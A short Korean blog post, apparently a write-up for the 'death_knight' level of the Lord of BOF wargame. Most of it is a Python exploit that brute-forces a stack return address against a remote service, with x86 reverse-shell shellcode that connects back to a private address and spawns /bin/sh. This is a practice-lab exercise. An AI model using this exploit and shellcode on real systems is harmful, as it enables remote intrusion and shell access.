Phantom

death_knight 본문

Pwnable/[Wargame]Load of Bof

death_knight

Ph4nt0m_ 2017. 1. 10. 23:53
반응형

아 망할 독감 ㅡㅡ 열이 38.9도로 너무 올라가서 일단 페이로드만 올린다


이번은 아주 간단한 remote exploit 이다


리버스쉘을 사용 했으며 코드는 이렇다


from socket import *

from struct import pack



p = lambda x: struct.pack("<L",x)


buf = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\xc0\xa8\x01\x0f\x66\x68\x0a\xa0\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"





for i in range(0xff, 0x00, -1):

for j in range(0xff, 0x00, -1):


sock = socket(AF_INET, SOCK_STREAM)

sock.connect(('192.168.1.5', 6666))


payload = "\x90"*44 + chr(j) + chr(i) + "\xff\xbf" + "\x90"*(256-48-len(buf)) + buf


sock.send(payload)

print "0xbfff%02x%02x"%(i,j)


sock.close()


브루트 포싱으로 뒷주소를 무작위로 사용하여 페이로드 코드를 집어넣는다

반응형

'Pwnable > [Wargame]Load of Bof' 카테고리의 다른 글

[Deathknight] xavius -> death_knight 풀이  (0) 2017.04.20
nightmare  (0) 2017.01.06
zombie_assassin  (0) 2017.01.05
assassin -> zombie_assassin  (0) 2017.01.04
[Giant] giant -> assassin 풀이  (0) 2015.01.08
Comments